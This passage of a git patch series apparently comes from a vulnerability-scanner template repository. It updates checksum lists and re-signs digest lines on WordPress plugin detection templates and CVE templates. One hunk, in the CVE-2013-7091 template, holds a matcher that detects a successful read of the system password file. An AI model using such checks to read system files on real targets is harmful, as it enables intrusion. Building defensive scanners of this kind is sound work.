-http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-logging.yaml:43cc5e8e1534e83039984a4f1affb3c2552fe63f -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:10b7d3c96ef44d16cc9ab5da9eeed5395f11396d +http/technologies/wordpress/plugins/worker.yaml:3a52748a5a5d6a1e9ef998c57e829ed786b3c9b1 +http/technologies/wordpress/plugins/wp-crontrol.yaml:80a4d7e45222ec5563a84b32bc2e7e2f596b51b6 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:209582da9da80f74135f8ad6d4214a0dfa691536 +http/technologies/wordpress/plugins/wp-file-manager.yaml:9fd6d0e88442b8d5e53747b54a8929512089b319 +http/technologies/wordpress/plugins/wp-google-maps.yaml:8a0c827d7e50762d8a2d0037d20c1e8fb0a5eabc +http/technologies/wordpress/plugins/wp-mail-logging.yaml:61ee6fc5c7da88caba77b3da4acc4ba1493fe80b +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:60ce5676e3a16ae7dc9a297af7fa77fc68785b3e +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:9e05a8af56e1e345f96570dfab2ec1c7a78d8365 http/technologies/wordpress/plugins/wp-migrate-db.yaml:e4d387e29ada0961b3320d2b69e8773746ca268a -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:f4c7cdc232e5a6e1cddb08fd959762452c5aacdc +http/technologies/wordpress/plugins/wp-optimize.yaml:6c9d7ce1565bc3a7c71b7dd3be7873360afe5ed2 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:72d78879144cd0740134a518d577b0caf61d9325 +http/technologies/wordpress/plugins/wp-reset.yaml:a86656c246bc5ca29419162196f39c5d59d61243 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:f04c7ef0ff6ec109ae7920d8edd6388c4811a2c8 +http/technologies/wordpress/plugins/wp-rollback.yaml:718fba0447a33037f1dce0b3525ad8619d904656 +http/technologies/wordpress/plugins/wp-seopress.yaml:58ac22b7cd81f701b9dba004dc598a651a2ec191 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:30c552edc46e20dd4ad0cf0c8d27fef8bd9df39f +http/technologies/wordpress/plugins/wp-smushit.yaml:bc0d9f69e0b97f3ca812400d10edeaac34dac1fe +http/technologies/wordpress/plugins/wp-statistics.yaml:83994a9fe8adea557519f44d916fdbf100f39b70 +http/technologies/wordpress/plugins/wp-super-cache.yaml:4c63fdbe29f235b5f4b0cf18400b2868c3de98f6 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:530450e7cd8214091c9f2d81cd5b7bc09a10148b +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:3778a95bad9b9410fc508fa0b77933f8a155bbed +http/technologies/wordpress/plugins/wpforms-lite.yaml:1f891311ee12fd618fabf2587f37a1fbe908852b +http/technologies/wordpress/plugins/wps-hide-login.yaml:07cfd760ea6f6d4b021a68422c44ddbaf16fb83f +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:eda484a978a322bcbd71dff686d2318bf51f0e11 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:d1d11801a94d23ab2fbeb2b22081cbb45db17abf http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cf9a544627bf169a3572f810cd893cecdfdaec2d http/technologies/wordpress-detect.yaml:743b35c9139a66a10e24776aabe59d58f5e4f63c http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -9461,7 +9462,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:96fce1a5bbece94aa04d9788ee9e1e784488ccfb +templates-checksum.txt:2b41f5832663c6016a1e150bc7a88c3b24980dc5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c4963f969049366419f8ad52a1723b9cf8f15324 Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 07:28:12 +0000 Subject: [PATCH 081/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2013/CVE-2013-7091.yaml | 2 +- http/exposed-panels/traccar-panel.yaml | 3 +-- http/exposed-panels/txadmin-panel.yaml | 2 ++ http/technologies/mirth-connect-detect.yaml | 2 ++ http/technologies/wordpress/plugins/ad-inserter.yaml | 3 +-- http/technologies/wordpress/plugins/add-to-any.yaml | 3 +-- http/technologies/wordpress/plugins/admin-menu-editor.yaml | 3 +-- .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 3 +-- http/technologies/wordpress/plugins/akismet.yaml | 3 +-- http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 3 +-- .../wordpress/plugins/all-in-one-wp-migration.yaml | 3 +-- .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 3 +-- http/technologies/wordpress/plugins/amp.yaml | 3 +-- http/technologies/wordpress/plugins/antispam-bee.yaml | 3 +-- http/technologies/wordpress/plugins/astra-sites.yaml | 3 +-- http/technologies/wordpress/plugins/autoptimize.yaml | 3 +-- http/technologies/wordpress/plugins/backwpup.yaml | 3 +-- http/technologies/wordpress/plugins/better-search-replace.yaml | 3 +-- http/technologies/wordpress/plugins/better-wp-security.yaml | 3 +-- .../wordpress/plugins/black-studio-tinymce-widget.yaml | 3 +-- http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 3 +-- http/technologies/wordpress/plugins/breeze.yaml | 3 +-- http/technologies/wordpress/plugins/broken-link-checker.yaml | 3 +-- http/technologies/wordpress/plugins/chaty.yaml | 3 +-- .../wordpress/plugins/child-theme-configurator.yaml | 3 +-- http/technologies/wordpress/plugins/classic-editor.yaml | 3 +-- http/technologies/wordpress/plugins/classic-widgets.yaml | 3 +-- .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 3 +-- http/technologies/wordpress/plugins/cmb2.yaml | 3 +-- http/technologies/wordpress/plugins/coblocks.yaml | 3 +-- http/technologies/wordpress/plugins/code-snippets.yaml | 3 +-- http/technologies/wordpress/plugins/coming-soon.yaml | 3 +-- http/technologies/wordpress/plugins/complianz-gdpr.yaml | 3 +-- .../wordpress/plugins/contact-form-7-honeypot.yaml | 3 +-- http/technologies/wordpress/plugins/contact-form-7.yaml | 3 +-- http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 3 +-- http/technologies/wordpress/plugins/cookie-law-info.yaml | 3 +-- http/technologies/wordpress/plugins/cookie-notice.yaml | 3 +-- http/technologies/wordpress/plugins/copy-delete-posts.yaml | 3 +-- http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 3 +-- .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 3 +-- http/technologies/wordpress/plugins/custom-css-js.yaml | 3 +-- http/technologies/wordpress/plugins/custom-fonts.yaml | 3 +-- http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 3 +-- http/technologies/wordpress/plugins/disable-comments.yaml | 3 +-- http/technologies/wordpress/plugins/disable-gutenberg.yaml | 3 +-- http/technologies/wordpress/plugins/duplicate-page.yaml | 3 +-- http/technologies/wordpress/plugins/duplicate-post.yaml | 3 +-- http/technologies/wordpress/plugins/duplicator.yaml | 3 +-- .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 3 +-- .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 3 +-- http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/elementor.yaml | 3 +-- http/technologies/wordpress/plugins/elementskit-lite.yaml | 3 +-- http/technologies/wordpress/plugins/enable-media-replace.yaml | 3 +-- http/technologies/wordpress/plugins/envato-elements.yaml | 3 +-- .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 3 +-- http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 3 +-- http/technologies/wordpress/plugins/extendify.yaml | 3 +-- .../wordpress/plugins/facebook-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/fast-indexing-api.yaml | 3 +-- http/technologies/wordpress/plugins/flamingo.yaml | 3 +-- http/technologies/wordpress/plugins/fluent-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/fluentform.yaml | 3 +-- http/technologies/wordpress/plugins/font-awesome.yaml | 3 +-- .../wordpress/plugins/force-regenerate-thumbnails.yaml | 3 +-- http/technologies/wordpress/plugins/formidable.yaml | 3 +-- http/technologies/wordpress/plugins/forminator.yaml | 3 +-- http/technologies/wordpress/plugins/ga-google-analytics.yaml | 3 +-- .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 3 +-- .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 3 +-- .../wordpress/plugins/google-analytics-for-wordpress.yaml | 3 +-- .../wordpress/plugins/google-listings-and-ads.yaml | 3 +-- http/technologies/wordpress/plugins/google-site-kit.yaml | 3 +-- .../wordpress/plugins/google-sitemap-generator.yaml | 3 +-- http/technologies/wordpress/plugins/gtranslate.yaml | 3 +-- http/technologies/wordpress/plugins/gutenberg.yaml | 3 +-- .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 3 +-- .../wordpress/plugins/header-footer-code-manager.yaml | 3 +-- .../wordpress/plugins/header-footer-elementor.yaml | 3 +-- http/technologies/wordpress/plugins/header-footer.yaml | 3 +-- http/technologies/wordpress/plugins/health-check.yaml | 3 +-- http/technologies/wordpress/plugins/hello-dolly.yaml | 3 +-- http/technologies/wordpress/plugins/host-webfonts-local.yaml | 3 +-- http/technologies/wordpress/plugins/hostinger.yaml | 3 +-- http/technologies/wordpress/plugins/image-optimization.yaml | 3 +-- http/technologies/wordpress/plugins/imagify.yaml | 3 +-- .../wordpress/plugins/insert-headers-and-footers.yaml | 3 +-- http/technologies/wordpress/plugins/instagram-feed.yaml | 3 +-- .../wordpress/plugins/intuitive-custom-post-order.yaml | 3 +-- http/technologies/wordpress/plugins/jetpack-boost.yaml | 3 +-- http/technologies/wordpress/plugins/jetpack.yaml | 3 +-- http/technologies/wordpress/plugins/kadence-blocks.yaml | 3 +-- http/technologies/wordpress/plugins/kirki.yaml | 3 +-- http/technologies/wordpress/plugins/leadin.yaml | 3 +-- .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 3 +-- http/technologies/wordpress/plugins/limit-login-attempts.yaml | 3 +-- http/technologies/wordpress/plugins/litespeed-cache.yaml | 3 +-- http/technologies/wordpress/plugins/loco-translate.yaml | 3 +-- http/technologies/wordpress/plugins/loginizer.yaml | 3 +-- .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 3 +-- http/technologies/wordpress/plugins/mailpoet.yaml | 3 +-- http/technologies/wordpress/plugins/maintenance.yaml | 3 +-- http/technologies/wordpress/plugins/mainwp-child.yaml | 3 +-- http/technologies/wordpress/plugins/malcare-security.yaml | 3 +-- http/technologies/wordpress/plugins/megamenu.yaml | 3 +-- http/technologies/wordpress/plugins/members.yaml | 3 +-- http/technologies/wordpress/plugins/meta-box.yaml | 3 +-- http/technologies/wordpress/plugins/metform.yaml | 3 +-- http/technologies/wordpress/plugins/ml-slider.yaml | 3 +-- http/technologies/wordpress/plugins/newsletter.yaml | 3 +-- .../wordpress/plugins/nextend-facebook-connect.yaml | 3 +-- http/technologies/wordpress/plugins/nextgen-gallery.yaml | 3 +-- http/technologies/wordpress/plugins/ninja-forms.yaml | 3 +-- http/technologies/wordpress/plugins/ocean-extra.yaml | 3 +-- .../wordpress/plugins/official-facebook-pixel.yaml | 3 +-- http/technologies/wordpress/plugins/one-click-demo-import.yaml | 3 +-- http/technologies/wordpress/plugins/optinmonster.yaml | 3 +-- http/technologies/wordpress/plugins/otter-blocks.yaml | 3 +-- http/technologies/wordpress/plugins/password-protected.yaml | 3 +-- http/technologies/wordpress/plugins/pdf-embedder.yaml | 3 +-- .../wordpress/plugins/pinterest-for-woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/pixelyoursite.yaml | 3 +-- http/technologies/wordpress/plugins/polylang.yaml | 3 +-- http/technologies/wordpress/plugins/popup-maker.yaml | 3 +-- http/technologies/wordpress/plugins/post-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/post-types-order.yaml | 3 +-- .../wordpress/plugins/premium-addons-for-elementor.yaml | 3 +-- http/technologies/wordpress/plugins/pretty-link.yaml | 3 +-- http/technologies/wordpress/plugins/really-simple-captcha.yaml | 3 +-- http/technologies/wordpress/plugins/really-simple-ssl.yaml | 3 +-- http/technologies/wordpress/plugins/redirection.yaml | 3 +-- http/technologies/wordpress/plugins/redux-framework.yaml | 3 +-- http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 3 +-- .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 3 +-- http/technologies/wordpress/plugins/safe-svg.yaml | 3 +-- http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 3 +-- http/technologies/wordpress/plugins/sg-cachepress.yaml | 3 +-- http/technologies/wordpress/plugins/sg-security.yaml | 3 +-- http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 3 +-- .../wordpress/plugins/shortpixel-image-optimiser.yaml | 3 +-- .../wordpress/plugins/simple-custom-post-order.yaml | 3 +-- http/technologies/wordpress/plugins/simple-history.yaml | 3 +-- http/technologies/wordpress/plugins/siteguard.yaml | 3 +-- http/technologies/wordpress/plugins/siteorigin-panels.yaml | 3 +-- http/technologies/wordpress/plugins/smart-slider-3.yaml | 3 +-- http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 3 +-- .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 3 +-- .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 3 +-- http/technologies/wordpress/plugins/sucuri-scanner.yaml | 3 +-- http/technologies/wordpress/plugins/svg-support.yaml | 3 +-- http/technologies/wordpress/plugins/tablepress.yaml | 3 +-- http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 3 +-- http/technologies/wordpress/plugins/templately.yaml | 3 +-- http/technologies/wordpress/plugins/the-events-calendar.yaml | 3 +-- http/technologies/wordpress/plugins/tinymce-advanced.yaml | 3 +-- .../wordpress/plugins/translatepress-multilingual.yaml | 3 +-- .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 3 +-- .../wordpress/plugins/under-construction-page.yaml | 3 +-- http/technologies/wordpress/plugins/updraftplus.yaml | 3 +-- http/technologies/wordpress/plugins/user-role-editor.yaml | 3 +-- http/technologies/wordpress/plugins/w3-total-cache.yaml | 3 +-- .../wordpress/plugins/webp-converter-for-media.yaml | 3 +-- http/technologies/wordpress/plugins/webp-express.yaml | 3 +-- .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 3 +-- .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 3 +-- .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 3 +-- .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 3 +-- .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce-payments.yaml | 3 +-- .../wordpress/plugins/woocommerce-paypal-payments.yaml | 3 +-- .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce-services.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/wordfence.yaml | 3 +-- http/technologies/wordpress/plugins/wordpress-importer.yaml | 3 +-- http/technologies/wordpress/plugins/wordpress-seo.yaml | 3 +-- http/technologies/wordpress/plugins/worker.yaml | 3 +-- http/technologies/wordpress/plugins/wp-crontrol.yaml | 3 +-- http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 3 +-- http/technologies/wordpress/plugins/wp-file-manager.yaml | 3 +-- http/technologies/wordpress/plugins/wp-google-maps.yaml | 3 +-- http/technologies/wordpress/plugins/wp-mail-logging.yaml | 3 +-- http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 3 +-- http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 3 +-- http/technologies/wordpress/plugins/wp-optimize.yaml | 3 +-- http/technologies/wordpress/plugins/wp-pagenavi.yaml | 3 +-- http/technologies/wordpress/plugins/wp-reset.yaml | 3 +-- .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 3 +-- http/technologies/wordpress/plugins/wp-rollback.yaml | 3 +-- http/technologies/wordpress/plugins/wp-seopress.yaml | 3 +-- http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 3 +-- http/technologies/wordpress/plugins/wp-smushit.yaml | 3 +-- http/technologies/wordpress/plugins/wp-statistics.yaml | 3 +-- http/technologies/wordpress/plugins/wp-super-cache.yaml | 3 +-- http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 3 +-- http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 3 +-- http/technologies/wordpress/plugins/wpforms-lite.yaml | 3 +-- http/technologies/wordpress/plugins/wps-hide-login.yaml | 3 +-- http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 3 +-- .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 3 +-- javascript/default-logins/ssh-default-logins.yaml | 2 +- 204 files changed, 206 insertions(+), 402 deletions(-) diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index eaac3b1836..a59c75690a 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -62,4 +62,4 @@ http: - type: regex regex: - "root:.*:0:0:" -# digest: 4a0a0047304502201b7a6938b4ba249a10fc7db131b554a3a5d026eea84f0c017f906046552a884c022100d7fc5da079a0e863422c5d15ac03bc2118e7a68415cc1181fa9d1b87ca1da794:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b97dc7216d247bc3f2a24b3c5f7cc69ec237ac053ae91149c8c54229febc73ba022100a2c9b0d7bfdd0c58db33d911d5b00093258fd66f97aee175992679341128cb1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/traccar-panel.yaml b/http/exposed-panels/traccar-panel.yaml index 0983f4a421..c812443311 100644 --- a/http/exposed-panels/traccar-panel.yaml +++ b/http/exposed-panels/traccar-panel.yaml @@ -25,5 +25,4 @@ http: - 'contains_any(body, "Traccar", "Traccar GPS Tracking System")' - 'status_code == 200' condition: and - -# digest: 490a00463044022038c5e46eaf5d16d03ca8c3a9016c9994b93e08a78dcd2e2878003e52c2bc4bd202203d68918a7fa18048c247c0e01a3b60293b3bbedb73d63ac916705f64125b1b4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201869453a9072a735a4cde34edbdaedf6b7893d1988a8f7b37ec365eaf47429d9022100dd5206a52ada302c99f97ebabf63077ce04a3478fc2440f11470977f266c87e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/txadmin-panel.yaml b/http/exposed-panels/txadmin-panel.yaml index 77dade9f4f..28920e9bc0 100644 --- a/http/exposed-panels/txadmin-panel.yaml +++ b/http/exposed-panels/txadmin-panel.yaml @@ -23,3 +23,5 @@ http: - 'contains_any(body, "txAdmin Login", "txAdmin Logo")' - 'status_code == 200' condition: and + +# digest: 4b0a00483046022100a89e63f01439862278df2449a7397ceb19286d0b56f6351c1a4d80b93e330962022100e74023bb2ad3d47258f7a6471a2359150970301c643c2f3c400ce2e08dad7e13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/mirth-connect-detect.yaml b/http/technologies/mirth-connect-detect.yaml index 2b2929499d..aa6121f944 100644 --- a/http/technologies/mirth-connect-detect.yaml +++ b/http/technologies/mirth-connect-detect.yaml @@ -28,3 +28,5 @@ http: - type: status status: - 200 + +# digest: 4b0a004830460221009db8883fb67824a1e00773576aebe46af6c8818b422c71cadcfe56bb4e98d41c0221008fbc6f0002cf712c7cc3c688196ba3aab07e193689e18773a03c2940fceddafc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3b20721481..ef120d9b7c 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205b34bc30b75c1db842ad2234ff2c4aebd1a9ce8ec9b6786eef5daf79b81891f602202ae17303c883defce0eaca097488c1d8598b0e5b1cced30b488c0dd9a1e985b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a378b2edf6bdd469cfc423761b318908f6f1aa06847f064138882e1a1f7682f70220724171d08675bad05e70935e3dff4c814c3f6b85a6e60bc0ce035dbe85e7dbd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 0d91af5b2a..6b0b25ab01 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022008399dcf6eca4c837fedf636f2d9e439bb391dc4b42aa9dea5b56ffccc7ad4c8022100fec42d9550544871adc0dd1b0b50c6e0e178557ad4c37750ffc708b4d9849572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4f4d117256e4ab53118f7924f1a8b5fe9dca15b8ba0658220eaf0a3bd754f47022100cf1b6f1ab980f0f4f46d885bec651c95ad912fe40e4c09926fcd5b4cf9222e0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 62a3be6e27..1ce517ff9d 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b3ece283cdb32931841da7cb46ba5c6c3b92565cae3bb568af7eea7fd24d111a022032183a788b0684c496a59dc1c1c2533d5234e7059b727534989d3f1960ede0bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206da0628df02a408baa03291f607d7668af1c0495db8379d8ce0b9a95bf15880e02210094447ac5963e2a57bbbfd5e54d8d4f7f49d08f547660e52aa0cfe954305d93d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index c9afe15ca3..31086291b5 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220126e9aab94c078979d6b3e98049d9ee47de5a6e3b6011130e78855b9f95f9ae002200710629b4f2b4609489069dcfeaa946bbed212ff97ace486948c302c3f8aafa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a5df7925e8c814313b3ac52eba66a440e40009a42a5bac0bbc4b962668bbf004022100c9565942e02fb7ba5e1872cc072c085fcd57a8a5a71ac1e78c017711c5261c32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index a01b4dc8b5..3298ed04a3 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205b7296e36c28aa2aa96e7cfc77233df553ac81fa7da9a359cc90e6bdba9fc4c2022018ed77b6b5e0cd47748c1ae2e5627e74d8c5c92588f4fd6e07380490a0352447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220379d5075c37b8a156aabbe5ec9427c249b5dc7007da39b151a266a1c457c36a402207cd5d6c31f6a308571a75b35ff0e5ff0a2df2ad5390a88ff2389db512b771028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index da144a53b6..0eaf1deb3f 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200a8c82ae94cad964384d2b520d86568f8d459b2470f8db339f99c6cb03c0e133022100ff70d7210f6801bf2f16ea74798f04e006ccb3a498b2fb5644ea41a02dd2bbdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee226741ac1cb89c52892d7e0c6bd9cbd5179b5da3c07b27fd68eaf08e6cd6bf02205246cb10a2d1c56c78ad8e051b699e262053dfbc777336308e37487650fd24ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index c4530d5d53..2d6c594646 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100bcdffbc2c21600b2cc22aa0a7233f5542d069e4661d31d8bbe81e417499edef4022077b2df0927cd33ce55f7f39f345a153f603d013eac2c1722c91dd54e848e2ae3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100983894aa2d3d94d5b8c615fe37cb65eee8c07065a7bcb4672d1e19bb461e8b9502201cf1d20a4d933009e4a527372808de4d7f66033c72d9f6f27a44d35217f48fc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8caf1c0dea..0c1d1f6fbe 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,5 +46,4 @@ http: part: body regex: - 